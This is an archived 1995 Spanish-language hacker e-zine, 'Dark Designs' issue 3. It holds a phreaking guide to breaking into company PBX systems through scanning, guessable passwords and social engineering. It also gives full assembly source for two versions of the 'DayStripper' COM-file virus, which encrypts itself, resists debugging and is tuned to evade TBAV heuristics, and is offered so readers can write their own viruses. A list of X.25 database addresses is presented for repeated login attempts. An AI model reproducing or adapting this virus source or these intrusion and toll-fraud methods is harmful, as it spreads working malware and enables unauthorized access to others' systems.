Copy Link
Add to Bookmark
Report

Dark Designs Issue 03

eZine's profile picture
Published in 
Dark Designs
 · 3 years ago

DíDÓ CODES:

FILE NUMBER: 3
DATE: 8 / 1995

  __________________________________________ 
| ___ ____ ____ _ __ |
| | \ | || _|| |/ / |
| | | || || \ | \ |
| |___/ |_||_||_|\_||_|\_\ |
| ___ ____ _____ _ ____ _ _ _____ |
| | \ | __|/ ___/| || __|| \| |/ ___/ |
| | | || __|\___ \| || |_-\| | |\___ \ |
| |___/ |____|/____/|_||____||_|__|/____/ |
|__________________________________________|


PRESENTS

Another DíDÓ publication

ADVERTENCIA: El material comentado a continuación NO ES ILEGAL, mientras que el uso del mismo puede llegar a serlo. Advertimos que Dark Designs [DíDÓ] asi como los autor/es del file, NO SE RESPONSABILIZAN por el uso o mal uso que el lector pueda llegar a darle, asi como tampoco por los da§os que pueda originar. El UNICO RESPONSABLE de esta informacion es aquel que haga uso o mal uso de la misma.

Si no estas de acuerdo con la advertencia,no sigas leyendo.

============

 _ 
| |
|_| ntro.


Hola! Pensaban que se habian liberado de nosotros?? jejeje, NO! Despues de unos cuantos meses volvimos, no lo hicimos antes por varias causas, entre otras:

  • Por FIACA.
  • Por FIACA.
  • Por FIACA.
  • Por los putos examenes.
  • Ah! y por Fiaca.

Entonces, aca estamos de vuelta con nuestro tercer Info-File repleto de jugosa info para todos ustedes. Con respecto al anterior Info-File, gracias a todos los que nos llamaron a los BBS's felicitandonos por, principalmente, la nota de Cactus sobre Celulares y por lo de Internet. En estos meses que pasaron desde el Info-File 2 pasaron grandes cosas en el grupo y nos gustaria compartirlas con ustedes:

1. Damos la Bienvenida Oficial (Puah!) a DArk DEsignS a un nuevo integrante...: -> GHOST!
El se va a encargar de la parte de desarrollo de virus de [DíDÓ] asi que ya saben a quien dirigir sus grandes interrogantes (?).

2. Inauguramos Nuestro Zite en Mexico! Gracias a Megaflop, sysop de Tercer Planeta BBS (Mexico D.F.) y tambien Integrante activo de los S.W.A.T KaTz de Mexico. Asi que para los que vivan alli, no tendran que llamar a Buenos Aires, podran conseguir los tan preciados Info-Files en Tercer Planeta! (Ah! el fono esta al final del file)


OmYkron & Cactus [DíDÓ]

=======

Yendo al grano...en esta ocasion vamos a hablar sobre:

  • 000 - Private Branch eXchange (Theory & Hacking) by OmYkron.
  • 001 - DayStripper Virus by Ghost.
  • 010 - Nuas de Starnet (ARPAC pa' los amigos) By Cactus.
  • 011 - Unas palabras perdidas, by [DíDÓ] Staff.


- 000 - P.B.X.!

by OmYkron [DíDÓ]

Esta nota la escribi porque me di cuenta que la gran mayoria que usa o usaba uno o mas PBX's no tienen mucha idea de lo que son realmente, solo agarran el telefono, 'discan' un par de boludeces y hablan hasta que se les corta, cuando se les corta llaman de nuevo y asi siguen y siguen hasta que un dia se dan cuenta que se les acabo la joda porque le cambiaron el password o directamente lo deshabilitaron. Pensemos un poco, si consiguen un PBX, no se la pasen TODO el tiempo colgados, porque de esa forma pasan estas cosas:

  • a) No dejan que otro lo use.
  • b) Al estar usandolo continuamente hacen que haya mas probabiliDíDÓs de que se den cuenta que TODOS lo usaMOS.

No estoy diciendo que los usemos una vez por semana cada uno ni nada de eso, solo que cada uno lo use con moderacion, nada mas. Por favor, que nadie se lo tome mal, solo que seria mucho mejor si cada uno de nosotros aprende a no abusar, de esta forma, cada PBX que usemos durara mas.


Mucho escribir pero...Que corno quiere decir PBX?; es Private Branch eXchange, algo asi como Rama de Intercambio Privada, esto no aclara nada asi que digamos que es una Central Privada de Conmutacion, para aclarar un poco mas hagamos historia...En un principio eran centralitas con operadora de uso privado con capaciDíDÓs de manejo que podian ser de hasta algunos miles de lineas q ue interconectaban todos los telefonos de la empresa y permitian (Y TODAVIA permiten para nuestra alegria ;) la comunicacion con el exterior y viceversa. Con el tiempo la operadora tuvo cada vez menos trabajo hasta que se la acabo suprimiendola, tambien se le agregaron cada vez mas funciones, gracias a los metodos de digitalizacion de la voz, se pudo manejar indistintamente datos y voz, gracias a eso se crearon sistemas con Voice-Mail (Correo por Voz) y con deteccion automatica de comunicaciones de datos que derivaban el llamado a un interno que pudiera atender, y asi muchos servicios mas.

Pero cuando nos damos cuenta que un numero al que llamamos PODRIA ser un un PBX? Facil, no les paso nunca que llaman a alguna empresa y les atiende una grabacion que dice mas o menos con, a veces, una horrible musiquita de fondo: "Usted se ha comunicado con XXXXXXXXXXX, si sabe el numero de interno marquelo, sino espere y sera atendido". Al escuchar cualquier cosa parecida a esto podemos estar ante la presencia del codiciado PBX, puede ser que tenga Voice-Mail, Comunicacion con el Exterior ;), con internos (y sino para que lo quieren), etc. Es obvio que cualquiera de estas opciones pueden estar disponibles pero no habilitadas, o protegidas por passwords. Tambien puede ser que el servicio este habilitado pero que este restringido, por ejemplo, para los out-dial (las llamadas hacia el exterior) puede ser que no se acepten los numeros que comiencen con 0, esto para evitar que algun empleado llame a otro pais o a los nuevos servicios 0-747, 0-600 o 0-900 o que ALGUIEN del exterior sabiendo el password haga lo mismo (Porque hay gente TAN mala que se dedica a hacer eso, aunque no lo crean ;-). Hay otras veces que se restringe el tiempo de uso de un servicio, como en el uso del servicio de out-dial.

Ahora que sabemos algo mas sobre los PBX, podemos comenzar a tratar de encontrarlos, ya dijimos como se hace para detectar un POSIBLE PBX, lo que se necesita para comenzar a escanear es:

  • a) Una linea telefonica por tonos (o con un telefono con switch para cambiar de pulsos a tonos).
  • b) Mucha, pero mucha paciencia. (Sobre todo los que recien empiezan a escanear).
  • c) Algo para anotar las cosas que creamos importantes.

Sin lo primero lo unico que pueden hacer es matarse, respecto a lo segundo, si no tienen paciencia, olvidense, muchas veces hay que probar y probar muchas combinaciones de numeros y puede ser 'empelotante', pero al terminar uno se siente complacido por lo encontrado (aunque no siempre). De lo tercero nunca hay que olvidarse de tener porque uno nunca sabe que se va encontrar.


Lo mejor que se puede encontrar es un PBX que pertenezca a un 0-800, los de cobro revertido, por razones obvias, por lo que es por donde todo el mundo comienza escaneando. Entonces, nos ponemos comodos y comenzamos a 'discar', de repente... nos atiende la ya conocida grabacion... y ya podemos comenzar a husmear, los internos son numeros de 4 o 5 digitos asi que lo unico que se puede hacer es ir probando... a veces al poner el numero de interno escuchamos un tono de llamada, si no marcamos nada, despues de unos segundos atiende alguien, eso no nos interesa generalmente asi que lo que hay que hacer es antes que atienda nadie tenemos que marcar otro codigo que seria como un password para acceder al servicio o funcion que tiene ese interno. Puede ser que marcando un solo numero al entrar al PBX tambien accedamos a un servicio, por ejemplo, al marcar 0 en un numero que pertenece a una conocida empresa consecionaria en la fabricacion de cigarrilos, se accede a un servicio de atencion a provedores, o en la mayoria de los PBX, pulsando el 9 se accede al out-dial, que frecuentemente esta con password (pero se pueden encontrar sin clave), otras veces el out-dial esta 'escondido' dentro de un interno, en fin, hay muchas cosas que se pueden encontrar y muy interesantes, pero hay que ponerse.

Con respecto a los passwords, no todas las empresas las tienen en cuenta, muchas no se fijan en la seguridad y eso les ocasiona problemas. Pero si se encuentran con un password, acuerdense que en las empresas no tienen demasiada imaginacion asi que prueben primero combinaciones como:

- 10000;20000;.....n0000  \ 
- 11111;22222;.....nnnnn >Pueden ser tambien combinaciones
- 12345;54321;.....etc :) / de 4 digitos.


Como ven son todas combinaciones tontas asi que con un poco de tiempo... quien sabe, por ahi encuentran algo. Tambien se pueden conseguir los passwords dejando que atienda alguna persona y aplicando un poco de ingenieria social, pero para esto hay que estar seguro de lo que se va a decir y no titubear, yo personalmente no lo hice nunca.


Por ultimo, no hay que confundir los PBX's con centrales comunes con internos, ni tampoco con contestadores automaticos 'inteligentes', uno se puede dar cuenta de lo primero cuando solo se puede acceder a internos donde atiende alguna persona, y lo segundo es cuando se pueden escuchar mensajes grabados, dejar uno, escuchar el ruido de ambiente, etc.

La mayoria de las cosas que escribi se adquieren con la experiencia, no tienen que desanimarse si al principio no encuentran nada, a todos nos paso y a veces nos pasa, pero hay que insistir y no caerse. Una de las mejores cosas que se pueden hacer es ponerse de acuerdo entre un grupo y asignar a cada integrante un rango de numeros a escanear, cuando se encuentra algo, se lo comparte con los compa§eros.-

Bueno, espero que le haya interesado a alguien esta nota y quiero terminarla diciendoles:
USEN PERO NO ABUSEN!!!
Bye!
OmYkron [DíDÓ]


- 001 DayStripper Virus, Duro trabajo para el Tbav

by Ghost [DíDÓ]

Me presento, i'm Ghost, nuevo miembro de DíDÓ, y estoy especializado en el tema virus. Hice virus de toda clase y en mis notas voy a tratar de lograr que uds. tambien lo hagan.

En esta 1era. nota como para empezar les voy a mostrar un simple virus no residente, infector de com agregador, pero con una rutina encriptora que va a hacer que el tbav tarde como 30!!! segundos para analizar el file y no lo pueda desencriptar!!!!. Esto lo hago con el tbav porque el pobre scan de juancito usa una rutina recursiva no reentrante y por lo tanto no hay porque preocuparse, con un loop se cuelga (esto en la version pro registrada por supuesto, la shareware no tiene analisis heuristico).

Bueno, antes de empezar les digo que podemos hacer 2 cosas con esta rutina:

  1. Sacarle los jumps que hacen que el tbav se maree como 30s !!!, y el tbav despues lo va a desencriptar y va a poner el flag #.
  2. Dejarle los jumps y el tbav no lo va a desencriptar, pero va a poner el flag J.

Cuales son las diferencias!?

  1. el tbav tarda en desencriptar (si son muchos files tarda hasta el a§o 2000!), pero logra desencriptar y pone los flags c#, el flag 'c' es si no esta creado el antivir.dat, asi que no es cuenta. El flag '#' es porque justamente esta encriptado. Lo malo es que al encriptar un file, se genera codigo trash y a veces se crea solo por el buffer de el cpu codigo como 'int 26h' o algo asi y sin que uno quiera eso hace saltar otro flag del tbav, como el W, esto hace que se pongan en rojo los flags, porque como sabran si hay mas de 3 flags estos se imprimen en rojo. Esto puede hacer que el usuario se alarme mas y se de cuenta que esta nuestro bichito ahi.
  2. El tbav no tarda tanto, porque se queda con los jumps y solo muestra los siguientes flags: cJ, aca esta lo bueno, el tbav le da proridad a los J y no desencripta el file y por lo tanto SIEMPRE VA A PONER 1 SOLO FLAG (2 si contamos el 'c'). Entonces, al encontrar el 'J' el tbav obvia todo lo demas, justo por orden de prepondrancia, porque el 'J' esta en las rutinas de encriptamento, y entonces tenemos asegurados que no va a mostrar otro flag que el J, entonces siempre va a aparecer en gris y el usuario no le va a dar bola!.

Entienden la idea?, ahora les mando las dos versiones del virus:

----8<------------------------------------------------------------------ 

; DayStripper Virus v1.0 por GHOST [DíDÓ]
; No lo alteres LaMmEr es para aprender, hace el tuyo si podes.
; DíDÓ RuLeZ!!
; VerSion 1: Just jump flags 'cJ' in GrEy!
; Anti-DebugGing - AnTi HerisTiC TechniQueS
; FucK YoU TbAv!

.model tiny
.code
org 100h

begin:db 0e9h,1,0,'G' ; -> marca infectado
be2:
mov bp,sp
mov ah,30h ; inedito, para obtener el
int 21h ; offset gamma
be3:
mov bp,ss:[bp-6]
sub bp,offset be3
mov dx,vir_len-100h ; anti-debug choto, es el largo del virus,
add dx,si ; no esta en cx para joder al f-proto y
; y tbav. si cargamo un debugger y no carga
; los registros como lo hace el DOS el largo
; del virus va a estar mal y no se va a de-
; decriptar.
lea si,cryp+bp
mov cl,byte ptr cs:[key+bp]
lea di,[decr+bp]
jmp dizzy ; empiezo a marearlo.. jajajaja..

mov ax,4c00h ; -> para marear mas y evitar flags!
int 21h

dizzy2:
jmp dizzy3 ; ya me maree yo...

decr:
push di ; genial metodo. guarda en stack address
lodsb
sub al,cl
mov byte ptr cs:[si-1],al ; rutina decriptora en si
dec dx
jz cryp
ret ; vuelvo a esa direccion!!!. Menos bytes!.
; mas rapido!, antiheuristico.

dizzy3:
pop si ; me mareo ayun mas
jmp decr
key db 0 ; key de deencripción.

dizzy:
push si ; otro mareo con una rutina
lea si,dizzy2+bp ; muy piola.
push si
ret

;-- Parte del virus ecriptada ----------------------------------------------

cryp:
lea si,buff+bp ; restauro bytes..
mov di,100h
movsw
movsw
mov ah,1ah
lea dx,dta+bp ; cambio DTA
int 21h
mov ah,4eh
go: lea dx,wild+bp
xor cx,cx
int 21h
jnc ok
jmp return
ok:
mov ax,3d02h
lea dx,[dta+1eh+bp]
int 21h
jnc ok2
jmp return
ok2:
xchg bx,ax
mov ah,3fh
mov cx,4
lea dx,buff+bp
int 21h
cmp byte ptr cs:[buff+3+bp],'G'
je next
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
cmp ax,63000d ; es muy grande!!
je next
sub ax,3
mov word ptr cs:[jump+1],ax

mov ax,8d00h
mov es,ax
xor di,di ; encripto el file en una zona de memoria
lea si,be2+bp ; exclusiva!, no usada por el DOS!, muy alta!.
mov cx,vir_len
rep movsb
mov di,offset cryp-104h
mov dx,vir_len
in al,40h
mov byte ptr es:[key-104h],al
mov cl,al
crypt:
mov al,byte ptr es:[di]
add al,cl
mov byte ptr es:[di],al
inc di
dec dx
jnz crypt

push es
pop ds
mov ah,40h
mov cx,vir_len ; escribo el virus
xor dx,dx
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
push cs cs
pop ds es
mov ah,40h
mov cx,4
lea dx,jump+bp ; escribo el jump
int 21h
mov ah,3eh
int 21h
jmp return
next: mov ah,4fh ; busco otro file
jmp go

return:
mov ax,100h ; vuelvo al hoste
jmp ax

;-- zona de DaTa ------

buff db 90h,90h,0cdh,20h ; buffer
jump db 0e9h,0,0,'G' ; jump con mArCa
wild db '*.COM',0 ; files a InFeCTar
autor db 'GHOST [DíDÓ]',0
auto1 db 'DayStripper Virus v1.0',0
auto2 db 'DíDÓ RuLeZ!!!',0

;-- Zona Del DtA --------
dta:

vir_len equ $ - offset be2 ; ViRas SiZE

end begin

--8<--------------------------------------------------------------------


Y ahora la version 2:

----8<------------------------------------------------------------------ 

; DayStripper Virus v2.0 por GHOST [DíDÓ]
; No lo alteres LaMmEr es para aprender, hace el tuyo si podes.
; DíDÓ RuLeZ!!
; VerSion 2: Just jump flags 'c#' maYbE OthEr, Red AlerT is PoSsiBle!
; Anti-DebugGing - AnTi HerisTiC TechniQueS
; FucK YoU TbAv!

.model tiny
.code
org 100h

begin:db 0e9h,1,0,'G' ; -> marca infectado
be2:
mov bp,sp
mov ah,30h ; inedito, para obtener el
int 21h ; offset gamma
be3:
mov bp,ss:[bp-6]
sub bp,offset be3
mov dx,vir_len-100h ; anti-debug choto, es el largo del virus,
add dx,si ; no esta en cx para joder al f-proto y
; y tbav. si cargamo un debugger y no carga
; los registros como lo hace el DOS el largo
; del virus va a estar mal y no se va a de-
; decriptar.
lea si,cryp+bp
mov cl,byte ptr cs:[key+bp]
lea di,[decr+bp]
decr:
push di ; genial metodo. guarda en stack address
lodsb
sub al,cl
mov byte ptr cs:[si-1],al ; rutina decriptora en si
dec dx
jz cryp
ret ; vuelvo a esa direccion!!!. Menos bytes!.
; mas rapido!, antiheuristico.
key db 0 ; key de deencripción.

;-- Parte del virus ecriptada ----------------------------------------------

cryp:
lea si,buff+bp ; restauro bytes..
mov di,100h
movsw
movsw
mov ah,1ah
lea dx,dta+bp ; cambio DTA
int 21h
mov ah,4eh
go: lea dx,wild+bp
xor cx,cx
int 21h
jnc ok
jmp return
ok:
mov ax,3d02h
lea dx,[dta+1eh+bp]
int 21h
jnc ok2
jmp return
ok2:
xchg bx,ax
mov ah,3fh
mov cx,4
lea dx,buff+bp
int 21h
cmp byte ptr cs:[buff+3+bp],'G'
je next
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
cmp ax,63000d ; es muy grande!!
je next
sub ax,3
mov word ptr cs:[jump+1],ax

mov ax,8d00h
mov es,ax
xor di,di ; encripto el file en una zona de memoria
lea si,be2+bp ; exclusiva!, no usada por el DOS!, muy alta!.
mov cx,vir_len
rep movsb
mov di,offset cryp-104h
mov dx,vir_len
in al,40h
mov byte ptr es:[key-104h],al
mov cl,al
crypt:
mov al,byte ptr es:[di]
add al,cl
mov byte ptr es:[di],al
inc di
dec dx
jnz crypt

push es
pop ds
mov ah,40h
mov cx,vir_len ; escribo el viruse
xor dx,dx
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
push cs cs
pop ds es
mov ah,40h
mov cx,4
lea dx,jump+bp ; escribo el jump
int 21h
mov ah,3eh
int 21h
jmp return
next: mov ah,4fh ; busco otro file
jmp go

return:
mov ax,100h ; vuelvo al hoste
jmp ax

;-- zona de DaTa ------

buff db 90h,90h,0cdh,20h ; buffer
jump db 0e9h,0,0,'G' ; jump con mArCa
wild db '*.COM',0 ; files a InFeCTar
autor db 'GHOST [DíDÓ]',0
auto1 db 'DayStripper Virus v2.0',0
auto2 db 'DíDÓ RuLeZ!!!',0

;-- Zona Del DtA --------
dta:

vir_len equ $ - offset be2 ; ViRas SiZE

end begin

--8<--------------------------------------------------------------------


Listo, espero que se diviertan y aprendan a hacer buenos virus anti-debugging y anti-heuristicos, y vean que hay gente que sabe aparte de los de DAN, ya DíDÓ no necesita complemento. DíDÓ RuLeZ!


Esta nota fue para comenzar, en la proxima les tengo un virus para Mbr que tunelea!! y es pseudo-mutante, ya van a ver!.

By Ghost [DíDÓ]
DíDÓ RuLeZ!


- 010 - BASES DE DATOS EN LA ARGENTINA CONECTADAS A ARPAC

(UtililDíDÓs Practicas)

By Cactus.

INTRO:

Para todo aquel que diga que ARPAC es una mierda, le digo que esta cometiendo un grave error, quizá la velocidad no sea la mejor de todas (2400 bps... PUAJJJ!), pero a pesar de ello es una red que nos brinda muchas ventajas.

Bueno, despues de mucho averiguar y scanear (que frase falsa!), estos son los resultados.

Las bases de datos que les doy son de cobro revertido, o sea que para conectarse a ellas no se requiere de ninguna NUI o IUR.
Solo basta con, una vez conectado a ARPAC, tipear el número de direccion del sistema al que se quiere llamar.

Step by step...

Pero cuales son las ventajas de acceder a un sistema por medio de ARPAC y no directamente por su numero telefonico?

Ok, imaginemos que queremos llamar a COMPUSERVE ARG.

Bueno, para entrar tenemos tres posibiliDíDÓs de poner el usuario y el password, de no acertar en ninguna de ellas el sistema nos desconectará y nos devolverá a la red ARPAC, pudiendo volver a entrar tipeando el nro de COMPUSERVE de nuevo y seguir intentando otras tres veces y asi sucesivamente,todo esto llamando UNA SOLA VEZ al nodo ARPAC mas cercano.

En cambio, si accedemos a COMPUSERVE ARG. llamando directamente a su número telefónico tendremos las tres oportuniDíDÓs y el sistema nos cortará, teniendo que volver a llamar nuevamente.

"LA LISTA" (negra).

Bueno, a continuacion les doy una lista con algunas de las bases de datos que hay en el pais, digo "algunas" porque SEGURAMENTE hay mas, que con el tiempo se iran descubriendo, por el momento solo tengo estas:

⁄---------------------------------------------------------------------ø 
| |
| NRO ARPAC EMPRESA DIRECCION TELEFONO |
| |
√---------------------------------------------------------------------¥
| |
| 211100717 SISCOTEL S.A. Rivadavia 822 331-6249 |
| 211103021 1er piso. FAX: 342-5437 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 211103237 COMPUSERVE ARG. Rivadavia 969 345-3871 |
| 2do. 354-3817/2786 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 214100326 TOTAL NET S.A. Talcahuano 38 383-7644/9359 |
| Piso 4 Of. "D" 383-2385 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 211140020 TELEINVERSION L.N.Alem 346 P.B. 311-5457/1704 |
| BURSATIL Capital Federal. 312-4264 |
√---------------------------------------------------------------------¥
| 211103030 NOSIS LABORATORIO San Martin 365 313-8285/6215 |
| DE INVESTIGACION Piso 1. 325-8409 |
| Y DESARROLLO. Capital Federal. |
√---------------------------------------------------------------------¥
| 211101130 DATA MARKETS Viamonte 611 322-1024 |
| Piso 9 - Dto "A" 322-0460 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 214160426 AUTOMOVIL CLUB Av. del Libertador 802-7139 |
| ARGENTINO 1850. 802-6991 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 211102302 SOCIEDAD RURAL Florida 470 326-4848 |
| ARGENTINA. Piso 3 - Of. 315 322-3431/2030 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 211100832 SAIJ (Sistema Bmé Mitre 2085 953-7729/0467 |
| 211101326 Argentino de Capital 953-8988/0988 |
| 211101406 Informatica Federal. |
| Juridica) |
√---------------------------------------------------------------------¥
| 214140102 ERREPAR Av. San Juan 960 |
| 214140106 Capital Federal. 27-5142/4394 |
√---------------------------------------------------------------------¥
| 211102407 TELNET S.A. Viamonte 723 322-0147 |
| Piso 5 - Of. 22 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 211101212 AKI Av. Belgrano 535 342-4417/5318 |
| 217101028 (Consejo Prof. Piso 2 C 331-1206 |
| Ing. Agronomica) Capital Federal. |
√---------------------------------------------------------------------¥
| 211140223 RECYT Cordoba 831 313-5471/1484 |
| (Sec. Ciencia y Piso 5 /1366 int.220 |
| Tecnologia) Capital Federal. |
√---------------------------------------------------------------------¥
| 214100439 Guia Practica del Lavalle 1125 382-2829/9866 |
| 214100440 Importador-Exp. Piso 3 of. 8 |
| Capital Federal. |
√---------------------------------------------------------------------¥
| 291100438 DIOGENES Fitz Roy 168 (091) 552121 |
| (Medicina) Bahia Blanca. |
√---------------------------------------------------------------------¥
| 211103209 RIMA (Red Inf. Belgrano 430 345-0868 |
| de Medicina de Piso 9 342-5699/4901 |
| Avanzada.) Capital Federal. |
√---------------------------------------------------------------------¥
| 211100611 DUN AND Florida 234 - 4to. 326-1124 |
| BRADSTREET. Capital Federal. 326-0451 |
√---------------------------------------------------------------------¥
| 251100805 FAST Montevideo 73 (051) 239036 |
| (Imposistiva Cordoba. 226731 |
| Laboral) |
√---------------------------------------------------------------------¥
| |
| 211102407 SISTEMA Unknown Unknown |
| TELETEL S.A. |
¿---------------------------------------------------------------------Ÿ


Ok, esto es todo (por ahora) , esperamos conseguir mas nuas que se las iremos pasando en otros info-files, por ahora tendran que conformarse con esto y/o encontrar mas por su cuenta.


Que se diviertan!


Cactus.


- 011 - UNAS PALABRAS PERDIDAS

Bueno, habran notado que falta la parte II de Internet, para todos aquellos que les interesaba el tema simplemente... JODANSEN! :)

NO! Les decia en el proximo Info-File seguiremos la nota, debido a inconvenientes "tecnicos" que no son de dominio publico (a la mierda!) el autor no pudo terminarlo, pero no se alegren! en el proximo numero estara todo como tiene que estar.

Mientras tanto espero que les haya servido de algo la info que se publico, y asi como ustedes nosotros tambien esperamos que el proximo numero sea dentro de poco!

Staff de [DíDÓ]


˛˛˛ COMO CONTACTARNOS ˛˛˛

Por cualquier cosa...llamen a.....

DíDÓ ZITE N¯1:

HORA 25 BBS -> : 54-1-739-2705 SysOp: CactuÙ.
TLD:24 a 06 Hs ı


DíDÓ ZITE N¯2:

JAM! BBS ----> : 54-1-750-8957 SysOp: Omùkrôn.
TLD:24 a 05 Hs


DíDÓ Info-Files' Distribution Zite:

ANDA-K-GAR! BBS: 54-1-503-5292 Sysop: Ice Cube.
TLD:24 Hs

MANIAC BBS : 54-1-522-5469 Sysop: Storm Night.
TLD:24 a 07 Hs


DíDÓ Info-Files' Mexican Distribution Zite:

TERCER PLANETA BBS: 52-5-606-2162 Sysop: Megaflop


Terminated.

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT